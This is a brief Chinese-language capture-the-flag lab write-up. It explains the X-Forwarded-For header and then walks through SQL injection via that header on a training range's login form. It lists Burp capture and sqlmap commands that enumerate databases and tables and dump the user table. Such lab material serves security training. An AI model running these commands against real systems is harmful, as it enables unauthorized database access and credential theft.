X-Forwarded-For知识点:
X-Forwarded-For 是一个 HTTP 扩展头部。
X-Forwarded-For 请求头格式:X-Forwarded-For:client,proxy1,proxy2
X-Forwarded-For: client, proxy1, proxy2
如果一个 HTTP 请求到达服务器之前,经过了三个代理 Proxy1、Proxy2、Proxy3,IP 分别为 IP1、IP2、IP3,用户真实 IP 为 IP0,那么按照 XFF 标准,服务端最终会收到以下信息:
X-Forwarded-For: IP0, IP1, IP2
题目描述
背景介绍
某业务系统,安全工程师"墨者"进行授权黑盒测试,系统的业主单位也没有给账号密码,怎么测?
实训目标
1、掌握SQL注入的基本原理;
2、了解服务器获取客户端IP的方式;
3、了解SQL注入的工具使用;
解题方向
对登录表单的各参数进行测试,找到SQL注入点,对数据库内容进行读取,找到账号与密码。
解题思路
1.打开靶场环境
2.按题意burp抓包测试X-Forwarded-For字段,可能存在注入点
3.将请求头放到txt,sqlmap测试
python2 sqlmap.py -r 1.txt --dbs --batch
python2 sqlmap.py -r 1.txt -D webcalendar --tables --batch
python2 sqlmap.py -r 1.txt -D webcalendar -T user --columns --batch
python2 sqlmap.py -r 1.txt -D webcalendar -T user -C username --dump --batch
python2 sqlmap.py -r 1.txt -D webcalendar -T user -C username --dump --batch